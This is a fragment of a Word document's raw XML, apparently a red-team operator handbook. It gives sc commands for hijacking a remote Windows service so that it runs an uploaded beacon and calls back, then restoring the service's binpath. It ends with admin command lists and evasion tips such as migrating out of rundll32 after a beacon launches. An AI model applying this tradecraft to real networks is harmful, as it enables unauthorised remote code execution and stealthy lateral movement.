    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sc \\&lt;IPofTarget&gt; query &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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17C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make note of the binpath of the service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; qc &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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17F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the Reset_Period equals 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; qfailure &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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182">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the binpath to point to the uploaded beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; config &lt;Service Name&gt; binpath= “&lt;c:\path\to\binary&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the service to receive callback</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; start &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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188">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the binpath back to its original value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; config &lt;ServiceName&gt; binpath= “&lt;c:\path\of\default\binary&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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18B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure the binpath was indeed changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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sc \\&lt;IPofTarget&gt; qc &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">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8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_25adoriag98o" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
      <w:pPr>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wmic useraccount get name, sid</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Acquires SIDS of users on domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
      <w:pPr>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shutdown /r</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Reboots a workstation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>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reg query hkcu</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Registry value lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
      <w:pPr>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sc query</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Display running services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">
      <w:pPr>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sc delete &lt;servicename&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Delete a service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yympju1urzbj" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>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ip a add &lt;ip address&gt;/&lt;cidr&gt; dev</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Adds an IP address to an interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
      <w:pPr>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&lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
      <w:pPr>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ip a del &lt;ip address&gt;/&lt;cidr&gt; dev  :Deletes an IP address from an interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>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&lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>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ip link set &lt;interface&gt; down</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Brings interface down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
      <w:pPr>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ip link set &lt;interface&gt; up</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Brings interface up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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19D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v0c7pzhkeoil" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Helpful Notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>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When a user removes a CAC card from a workstation, all connections are killed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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1A0">
      <w:pPr>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When CS launches a beacon, it uses rundll32.exe. Migrate from the process immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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1A2">
      <w:pPr>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A $ symbol after a share name means that the share is hidden.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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1A4">
      <w:pPr>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at the end of a network name designates a machine name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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1A6">
      <w:pPr>
        <w:contextualSpacing w:val="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C:\windows\system32 will always exist on a workstation. On a 64 bit workstation, all 64 bit executables reside in the system32 folder. SysWOW64 contains all 32 bit libraries.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:h="12240" w:w="7920"/>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7">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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>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